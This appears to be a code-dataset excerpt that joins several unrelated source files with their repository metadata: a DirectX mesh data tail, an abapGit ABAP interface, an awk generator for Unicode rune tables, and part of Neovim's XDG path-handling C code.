4;1333,1292,1293,1307;, 4;1307,1322,1312,1333;, 4;1314,1312,1322,1321;, 4;1321,1224,1225,1314;, 4;1206,1225,1224,1223;, 4;1223,1234,1205,1206;, 4;1236,1205,1234,1243;, 4;1243,1290,1289,1236;, 4;1331,1289,1290,1306;, 4;1306,1336,1309,1331;, 4;1311,1309,1336,1323;, 4;1323,1218,1219,1311;, 4;1214,1219,1218,1217;, 4;1217,1228,1213,1214;, 4;1238,1213,1228,1239;, 4;1239,1294,1285,1238;, 4;1288,1285,1294,1308;, 4;1308,1319,1320,1288;, 4;1252,1319,1308,1251;, 4;1318,1319,1252,1275;, 4;1324,1221,1318,1275;, 4;1220,1221,1324,1230;, 4;1229,1231,1220,1230;, 4;1241,1231,1229,1242;, 4;1272,1293,1241,1242;, 4;1307,1293,1272,1271;, 4;1274,1322,1307,1271;, 4;1321,1322,1274,1273;, 4;1296,1224,1321,1273;, 4;1223,1224,1296,1233;, 4;1232,1234,1223,1233;, 4;1243,1234,1232,1244;, 4;1270,1290,1243,1244;, 4;1306,1290,1270,1269;, 4;1277,1336,1306,1269;, 4;1323,1336,1277,1276;, 4;1295,1218,1323,1276;, 4;1217,1218,1295,1227;, 4;1226,1228,1217,1227;, 4;1239,1228,1226,1240;, 4;1253,1294,1239,1240;, 4;1308,1294,1253,1251;, 4;1251,1253,1173,1175;, 4;1240,1171,1173,1253;, 4;1240,1226,1169,1171;, 4;1227,1167,1169,1226;, 4;1227,1295,1165,1167;, 4;1276,1163,1165,1295;, 4;1276,1277,1161,1163;, 4;1269,1157,1161,1277;, 4;1269,1270,1160,1157;, 4;1244,1203,1160,1270;, 4;1244,1232,1201,1203;, 4;1233,1199,1201,1232;, 4;1233,1296,1197,1199;, 4;1273,1195,1197,1296;, 4;1273,1274,1193,1195;, 4;1271,1191,1193,1274;, 4;1271,1272,1189,1191;, 4;1242,1187,1189,1272;, 4;1242,1229,1185,1187;, 4;1230,1183,1185,1229;, 4;1230,1324,1181,1183;, 4;1275,1179,1181,1324;, 4;1275,1252,1177,1179;, 4;1251,1175,1177,1252;, 4;1177,1175,1176,1178;, 4;1175,1173,1174,1176;, 4;1173,1171,1172,1174;, 4;1171,1169,1170,1172;, 4;1169,1167,1168,1170;, 4;1167,1165,1166,1168;, 4;1165,1163,1164,1166;, 4;1163,1161,1162,1164;, 4;1161,1157,1158,1162;, 4;1157,1160,1159,1158;, 4;1160,1203,1204,1159;, 4;1203,1201,1202,1204;, 4;1201,1199,1200,1202;, 4;1199,1197,1198,1200;, 4;1197,1195,1196,1198;, 4;1195,1193,1194,1196;, 4;1193,1191,1192,1194;, 4;1191,1189,1190,1192;, 4;1189,1187,1188,1190;, 4;1187,1185,1186,1188;, 4;1185,1183,1184,1186;, 4;1183,1181,1182,1184;, 4;1181,1179,1180,1182;, 4;1179,1177,1178,1180;, 4;1178,1367,1366,1180;, 4;1180,1366,1365,1182;, 4;1182,1365,1364,1184;, 4;1184,1364,1363,1186;, 4;1186,1363,1362,1188;, 4;1188,1362,1361,1190;, 4;1190,1361,1360,1192;, 4;1192,1360,1359,1194;, 4;1194,1359,1382,1196;, 4;1196,1382,1381,1198;, 4;1198,1381,1380,1200;, 4;1200,1380,1379,1202;, 4;1202,1379,1378,1204;, 4;1204,1378,1377,1159;, 4;1159,1377,1376,1158;, 4;1158,1376,1375,1162;, 4;1162,1375,1374,1164;, 4;1164,1374,1373,1166;, 4;1166,1373,1372,1168;, 4;1168,1372,1371,1170;, 4;1170,1371,1370,1172;, 4;1172,1370,1369,1174;, 4;1174,1369,1368,1176;, 4;1176,1368,1367,1178;, 4;1368,1352,1351,1367;, 4;1369,1353,1352,1368;, 4;1370,1354,1353,1369;, 3;1353,1354,1155;, 3;1352,1353,1155;, 3;1351,1352,1155;, 3;1350,1351,1155;, 3;1349,1350,1155;, 4;1366,1350,1349,1365;, 4;1367,1351,1350,1366;, 4;1365,1349,1348,1364;, 3;1348,1349,1155;, 3;1347,1348,1155;, 4;1364,1348,1347,1363;, 4;1363,1347,1346,1362;, 3;1346,1347,1155;, 3;1345,1346,1155;, 4;1362,1346,1345,1361;, 4;1361,1345,1344,1360;, 3;1344,1345,1155;, 3;1343,1344,1155;, 3;1342,1343,1155;, 3;1341,1342,1155;, 3;1340,1341,1155;, 3;1339,1340,1155;, 3;1338,1339,1155;, 3;1337,1338,1155;, 3;1156,1337,1155;, 3;1154,1156,1155;, 3;1358,1154,1155;, 4;1375,1154,1358,1374;, 4;1376,1156,1154,1375;, 4;1377,1337,1156,1376;, 4;1378,1338,1337,1377;, 4;1379,1339,1338,1378;, 4;1380,1340,1339,1379;, 4;1381,1341,1340,1380;, 4;1382,1342,1341,1381;, 4;1359,1343,1342,1382;, 4;1360,1344,1343,1359;, 3;1357,1358,1155;, 4;1374,1358,1357,1373;, 4;1373,1357,1356,1372;, 3;1356,1357,1155;, 3;1355,1356,1155;, 4;1372,1356,1355,1371;, 4;1371,1355,1354,1370;, 3;1354,1355,1155;, 4;1320,1325,1287,1288;, 4;1285,1288,1287,1286;, 4;1285,1286,1237,1238;, 4;1213,1238,1237,1216;, 4;1213,1216,1215,1214;, 4;1219,1214,1215,1260;, 4;1219,1260,1300,1311;, 4;1309,1311,1300,1310;, 4;1309,1310,1330,1331;, 4;1289,1331,1330,1326;, 4;1289,1326,1235,1236;, 4;1205,1236,1235,1208;, 4;1205,1208,1207,1206;, 4;1225,1206,1207,1261;, 4;1225,1261,1304,1314;, 4;1312,1314,1304,1313;, 4;1312,1313,1332,1333;, 4;1292,1333,1332,1316;, 4;1292,1316,1268,1291;, 4;1209,1291,1268,1212;, 4;1209,1212,1211,1210;, 4;1222,1210,1211,1279;, 4;1222,1279,1302,1315;, 4;1320,1315,1302,1325;, 4;1287,1325,1335,1329;, 4;1286,1287,1329,1266;, 4;1237,1286,1266,1259;, 4;1216,1237,1259,1250;, 3;1250,1259,1258;, 4;1266,1267,1258,1259;, 3;1266,1329,1267;, 4;1335,1299,1267,1329;, 3;1335,1303,1299;, 4;1280,1283,1299,1303;, 3;1280,1247,1283;, 4;1279,1211,1247,1280;, 4;1302,1279,1280,1303;, 4;1325,1302,1303,1335;, 4;1211,1212,1248,1247;, 4;1248,1256,1283,1247;, 12;1297,1282,1258,1267,1299,1283,1256,1265,1298,1284,1254,1263;, 4;1250,1258,1282,1249;, 3;1278,1249,1282;, 4;1260,1215,1249,1278;, 4;1300,1260,1278,1301;, 4;1278,1282,1297,1301;, 3;1317,1301,1297;, 4;1310,1300,1301,1317;, 4;1330,1310,1317,1327;, 4;1326,1330,1327,1262;, 4;1235,1326,1262,1255;, 4;1208,1235,1255,1246;, 4;1207,1208,1246,1245;, 4;1261,1207,1245,1281;, 4;1304,1261,1281,1305;, 4;1313,1304,1305,1334;, 4;1332,1313,1334,1328;, 4;1316,1332,1328,1264;, 3;1264,1328,1265;, 4;1334,1298,1265,1328;, 3;1334,1305,1298;, 4;1281,1284,1298,1305;, 3;1281,1245,1284;, 4;1246,1254,1284,1245;, 3;1246,1255,1254;, 4;1262,1263,1254,1255;, 3;1262,1327,1263;, 4;1317,1297,1263,1327;, 4;1215,1216,1250,1249;, 3;1248,1257,1256;, 4;1212,1268,1257,1248;, 4;1268,1316,1264,1257;, 4;1264,1265,1256,1257;; MeshMaterialList { 1; 1702; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.000000;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _cap } # Frame _
Logos
3
Ybalrid/orbiter
Extern/mssdk_dx7/samples/Multimedia/VBSamples/D3DRM/media/engine1.x
[ "MIT" ]
INTERFACE zif_abapgit_xml_output PUBLIC . METHODS add IMPORTING !iv_name TYPE clike !ig_data TYPE any RAISING zcx_abapgit_exception . METHODS set_raw IMPORTING !ii_raw TYPE REF TO if_ixml_element . METHODS add_xml IMPORTING !iv_name TYPE clike !ii_xml TYPE REF TO if_ixml_element . METHODS render IMPORTING !iv_normalize TYPE abap_bool DEFAULT abap_true !is_metadata TYPE zif_abapgit_definitions=>ty_metadata OPTIONAL RETURNING VALUE(rv_xml) TYPE string . METHODS i18n_params IMPORTING !is_i18n_params TYPE zif_abapgit_definitions=>ty_i18n_params OPTIONAL RETURNING VALUE(rs_i18n_params) TYPE zif_abapgit_definitions=>ty_i18n_params . ENDINTERFACE.
ABAP
4
amit3kumar/ABAP_ALL
src/xml/zif_abapgit_xml_output.intf.abap
[ "MIT" ]
# See LICENSE file for copyright and license details. BEGIN { FS = ";" # set up hexadecimal lookup table for(i = 0; i < 16; i++) hex[sprintf("%X",i)] = i; } $3 ~ /^L/ { alphas[nalpha++] = $1; } $3 ~ /^Z/ || $5 == "WS" || $5 == "S" || $5 == "B" { spaces[nspace++] = $1; } $3 == "Cc" { cntrls[ncntrl++] = $1; } $3 == "Lu" { uppers[nupper++] = $1; tolowers[nuppercase++] = ($14 == "") ? $1 : $14; } $3 == "Ll" { lowers[nlower++] = $1; touppers[nlowercase++] = ($13 == "") ? $1 : $13; } $3 == "Lt" { titles[ntitle++] = $1; } $3 == "Nd" { digits[ndigit++] = $1; } END { mkis("alpha", alphas, nalpha, "runetype/isalpharune.c"); mkis("cntrl", cntrls, ncntrl, "runetype/iscntrlrune.c"); mkis("digit", digits, ndigit, "runetype/isdigitrune.c"); mkis("lower", lowers, nlower, "runetype/islowerrune.c", touppers, nlowercase, "upper"); mkis("space", spaces, nspace, "runetype/isspacerune.c"); mkis("title", titles, ntitle, "runetype/istitlerune.c"); mkis("upper", uppers, nupper, "runetype/isupperrune.c", tolowers, nuppercase, "lower"); } # parse hexadecimal rune index to int function code(s) { x = 0; for(i = 1; i <= length(s); i++) { c = substr(s, i, 1); x = (x*16) + hex[c]; } return x; } # generate 'is<name>rune' unicode lookup function function mkis(name, runes, nrune, file, cases, ncase, casename) { nsingle = 0; nrange = 0; nlace1 = 0; nlace2 = 0; mode = 1; # sort rune groups into singletons, ranges and laces for(j = 0; j < nrune; j++) { # range if(code(runes[j+1]) == code(runes[j])+1 && ((ncase == 0) || code(cases[j+1]) == code(cases[j])+1) && j+1 < nrune) { if(mode == 2) { continue; } else if(mode == 3) { laces11[nlace1] = runes[j]; nlace1++; } else if(mode == 4) { laces21[nlace2] = runes[j]; nlace2++; } mode = 2; ranges0[nrange] = runes[j]; if(ncase > 0) { rangecases[nrange] = cases[j]; } continue; } # lace 1 if(code(runes[j+1]) == code(runes[j])+2 && ((ncase == 0) || (code(cases[j+1]) == code(runes[j+1])+1 && code(cases[j]) == code(runes[j])+1)) && j+1 < nrune) { if(mode == 3) { continue; } else if(mode == 2) { ranges1[nrange] = runes[j]; nrange++; } else if(mode == 4) { laces21[nlace2] = runes[j]; nlace2++; } mode = 3; laces10[nlace1] = runes[j]; continue; } # lace 2 if(code(runes[j+1]) == code(runes[j])+2 && ((ncase == 0) || (code(cases[j+1]) == code(runes[j+1])-1 && code(cases[j]) == code(runes[j])-1)) && j+1 < nrune) { if(mode == 4) { continue; } else if(mode == 2) { ranges1[nrange] = runes[j]; nrange++; } else if(mode == 3) { laces11[nrange] = runes[j]; nlace1++; } mode = 4; laces20[nlace2] = runes[j]; continue; } # terminating case if(mode == 1) { singles[nsingle] = runes[j]; if(ncase > 0) { singlecases[nsingle] = cases[j]; } nsingle++; } else if(mode == 2) { ranges1[nrange] = runes[j]; nrange++; } else if(mode == 3) { laces11[nlace1] = runes[j]; nlace1++; } else { laces21[nlace2] = runes[j]; nlace2++; } mode = 1; } print "/* Automatically generated by mkrunetype.awk */" > file; print "#include \"runetype.h\"" > file; print "#define ISRUNE is"name"rune" > file; if(ncase > 0) { print "#define TORUNE to"casename"rune" > file; } mkisarray(file, "singles", ncase > 0 ? 2 : 1, nsingle, singles, singlecases); mkisarray(file, "ranges", ncase > 0 ? 3 : 2, nrange, ranges0, ranges1, rangecases); mkisarray(file, "laces1", 2, nlace1, laces10, laces11); mkisarray(file, "laces2", 2, nlace2, laces20, laces21); print "#include \"runetypebody.h\"" > file; } function mkisarray(file, name, ncols, nrows, column1, column2, column3) { if(nrows == 0) { return; } print "#define "toupper(name)" "name > file; if(ncols == 1) { print "static Rune "name"[][1] = {" > file; for(j = 0; j < nrows; j++) { print "\t{ 0x"column1[j]" }," > file; } } else if(ncols == 2) { print "static Rune "name"[][2] = {" > file; for(j = 0; j < nrows; j++) { print "\t{ 0x"column1[j]", 0x"column2[j]" }," > file; } } else if(ncols == 3) { print "static Rune "name"[][3] = {" > file; for(j = 0; j < nrows; j++) { print "\t{ 0x"column1[j]", 0x"column2[j]", 0x"column3[j]" }," > file; } } print "};" > file; }
Awk
4
zealoussnow/chromium
third_party/utf/src/bin/mkrunetype.awk
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
// This is an open source non-commercial project. Dear PVS-Studio, please check // it. PVS-Studio Static Code Analyzer for C, C++ and C#: http://www.viva64.com #include <stdbool.h> #include "nvim/ascii.h" #include "nvim/memory.h" #include "nvim/os/os.h" #include "nvim/os/stdpaths_defs.h" #include "nvim/path.h" /// Names of the environment variables, mapped to XDGVarType values static const char *xdg_env_vars[] = { [kXDGConfigHome] = "XDG_CONFIG_HOME", [kXDGDataHome] = "XDG_DATA_HOME", [kXDGCacheHome] = "XDG_CACHE_HOME", [kXDGRuntimeDir] = "XDG_RUNTIME_DIR", [kXDGConfigDirs] = "XDG_CONFIG_DIRS", [kXDGDataDirs] = "XDG_DATA_DIRS", }; #ifdef WIN32 static const char *const xdg_defaults_env_vars[] = { [kXDGConfigHome] = "LOCALAPPDATA", [kXDGDataHome] = "LOCALAPPDATA", [kXDGCacheHome] = "TEMP", [kXDGRuntimeDir] = NULL, [kXDGConfigDirs] = NULL, [kXDGDataDirs] = NULL, }; #endif /// Defaults for XDGVarType values /// /// Used in case environment variables contain nothing. Need to be expanded. static const char *const xdg_defaults[] = { #ifdef WIN32 [kXDGConfigHome] = "~\\AppData\\Local", [kXDGDataHome] = "~\\AppData\\Local", [kXDGCacheHome] = "~\\AppData\\Local\\Temp", [kXDGRuntimeDir] = NULL, [kXDGConfigDirs] = NULL, [kXDGDataDirs] = NULL, #else [kXDGConfigHome] = "~/.config", [kXDGDataHome] = "~/.local/share", [kXDGCacheHome] = "~/.cache", [kXDGRuntimeDir] = NULL, [kXDGConfigDirs] = "/etc/xdg/", [kXDGDataDirs] = "/usr/local/share/:/usr/share/", #endif }; /// Return XDG variable value /// /// @param[in] idx XDG variable to use. /// /// @return [allocated] variable value. char *stdpaths_get_xdg_var(const XDGVarType idx) FUNC_ATTR_WARN_UNUSED_RESULT { const char *const env = xdg_env_vars[idx]; const char *const fallback = xdg_defaults[idx]; const char *env_val = os_getenv(env); #ifdef WIN32 if (env_val == NULL && xdg_defaults_env_vars[idx] != NULL) { env_val = os_getenv(xdg_defaults_env_vars[idx]); } #else if (env_val == NULL && os_env_exists(env)) { env_val = ""; } #endif char *ret = NULL; if (env_val != NULL) { ret = xstrdup(env_val); } else if (fallback) { ret = (char *)expand_env_save((char_u *)fallback); } return ret; } /// Return Nvim-specific XDG directory subpath. /// /// Windows: Uses "…/nvim-data" for kXDGDataHome to avoid storing /// configuration and data files in the same path. #4403 /// /// @param[in] idx XDG directory to use. /// /// @return [allocated] "{xdg_directory}/nvim" char *get_xdg_home(const XDGVarType idx) FUNC_ATTR_WARN_UNUSED_RESULT { char *dir = stdpaths_get_xdg_var(idx); if (dir) { #if defined(WIN32) dir = concat_fnames_realloc(dir, (idx == kXDGDataHome ? "nvim-data" : "nvim"), true); #else dir = concat_fnames_realloc(dir, "nvim", true); #endif } return dir; } /// Return subpath of $XDG_CACHE_HOME /// /// @param[in] fname New component of the path. /// /// @return [allocated] `$XDG_CACHE_HOME/nvim/{fname}` char *stdpaths_user_cache_subpath(const char *fname) FUNC_ATTR_WARN_UNUSED_RESULT FUNC_ATTR_NONNULL_ALL FUNC_ATTR_NONNULL_RET { return concat_fnames_realloc(get_xdg_home(kXDGCacheHome), fname, true); } /// Return subpath of $XDG_CONFIG_HOME /// /// @param[in] fname New component of the path. /// /// @return [allocated] `$XDG_CONFIG_HOME/nvim/{fname}` char *stdpaths_user_conf_subpath(const char *fname) 